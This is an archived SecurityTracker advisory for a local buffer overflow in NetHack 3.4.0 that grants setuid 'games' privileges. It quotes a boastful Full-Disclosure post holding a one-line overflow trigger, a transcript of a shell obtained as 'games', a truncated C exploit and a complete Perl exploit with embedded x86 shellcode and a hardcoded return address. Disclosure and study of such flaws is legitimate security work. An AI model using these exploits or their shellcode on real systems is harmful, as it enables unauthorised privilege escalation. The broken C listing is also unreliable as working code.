Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Game)  >   NetHack Vendors:
NetHack Game Buffer Overflow Lets Local Users Obtain Additional Privileges
SecurityTracker Alert ID:  1006064
SecurityTracker URL:
CVE Reference:   CVE-2003-0358, CVE-2003-0359   (Links to External Site)
Updated:  Dec 4 2003
Original Entry Date:  Feb 10 2003
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): 3.4.0 and prior versions
Description:   A buffer overflow was reported in the NetHack game software. A local user can obtain additional privileges.

It is reported that a local user can supply a specially crafted command string to the nethack binary to trigger a buffer overflow and execute arbitrary code. On some distributions, the software is reportedly installed with set user id (setuid) 'games' privileges. A local user could obtain 'games' user privileges.

A demonstration exploit is provided:

nethack -s `perl -e "print 'A' x 1000"`

Some demonstration exploit code is provided in the Source Message.

Impact:   A local user can obtain 'games' user privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jun 13 2003 (Debian Issues Fix) NetHack Game Buffer Overflow Lets Local Users Obtain Additional Privileges
Debian has released a fix.

 Source Message Contents

Subject:  [Full-Disclosure] #!ICadv-02.09.03: nethack 3.4.0 local buffer overflow



/usr/games/lib/nethackdir/nethack - LOCALLY EXPLOITABLE BUFFER

try th1s: nethack -s `perl -e "print 'A' x 1000"`

nethack.RPM package for redhat 8 is installed SETUID GAMES!@)~*

ther pre compiled b1nz for come for Amiga, Atari, Linux, Mac, Msdos
OS/2, Windows. br0 u can even dl source and own it on *BSD, System V,
Solaris, HP-UX, BeOS and VMS! How tight is th1s w4r3z y0

thatz right, we can snatch games prives.. this are highly sought
after privz.. with th1s we can do stuff like.. writing our own highscore
files & such.. use it to impress your friends.. u will be the ULTIMATE

ch3ck th1s:

[tsao@c:\ tmp]$ ./n 224 400
shellcode at 159->220
Using bffff6d8

Cannot find any current entries for )���۳

Call is: nethack -s [-v] [-role] [maxrank] [playernames]
sh-2.05b$ id
uid=12(games) gid=500(tsao) groups=500(tsao)

to all the people who think this is lame: ANY PRIVILEDGE ESCALATION IS

greets: #!IC@EFNET / d4yj4y(lub yew bro.. thnx for help with C code)
greets: The-Rev - that regedit question was da b0mb. bizz0mb.
dis: #phrack@EFNET / the_ut -- I told you guys i was skilled & could code.

Attached is a C & PERL exploit, this is incase you do not have a C
compiler. I cover all the bases for u.

stay tuned for ftpd/apache warez, im pumping out more 0day than the_ut pumpz out
lame questionz to test my skillz..

p.s [tsao@c:\ tmp]# ssh -l tsao4sh0 -p 31337
    [root@phc /]# WHOZ THE UNIX TERRORIST NOW ?

p.p.s im gonna drop 7350 warez soon, year of the leak bitchez.

p.p.p.s squashing bugz is fun!

attached: nethacker.c /

<cut-me-here!!!!!!!! nethacker.c cut-me-here!!!!!!!>
        tsao@efnet #!IC@efnet 2k3
        thnx to aleph1 for execve shellcode &
        davidicke for setreuid() shellcode

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char code[] =


unsigned long sp(void) {
   __asm__("movl %esp,%eax");

int main(int argc, char **argv) {
     char *p;
     int i, off;

     p = malloc(sizeof(char) * atoi(argv[1]));

     off = 220 - strlen(code);
     printf("shellcode at %d->%d\n",off,off+strlen(code));
       p[i+off] = code[i];

     *(long *) &p[220] = sp() - atoi(argv[2]);
     printf("Using %x\n",sp() - atoi(argv[2]));


<eof-nethacker.c!!!!!!! eof-nethacker.c!!!!!!>

<cut-me-here !!!!!! cut-me-here!!!!>

#!/usr/bin/perl -w
# tsao@efnet #!IC@efnet 2k3
# thnx to aleph1 for execve shellcode
# davidicke for setreuid() shellcode

$sc .= "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\x31\xdb";
$sc .= "\x31\xc9\xb3\x0c\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e";
$sc .= "\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12";
$sc .= "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62";
$sc .=  "\x69\x6e\x2f\x73\x68\x01";

for ($i = 0; $i < (224 - (length($sc)) - 4); $i++) {
    $buf .= "\x90";

$buf .= $sc;
$buf .= "\xd2\xf8\xff\xbf";

exec("/usr/games/lib/nethackdir/nethack -s '$buf'");


tsao@efnet #!IC@efnet 2k3
tsao - owning ^ x.25 like none other.. fuq u jj
Version: Hush 2.2 (Java)
Note: This signature can be verified at


Concerned about your privacy? Follow this link to get
FREE encrypted email: 

Big $$$ to be made with the HushMail Affiliate Program:
Full-Disclosure - We believe in it.


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, LLC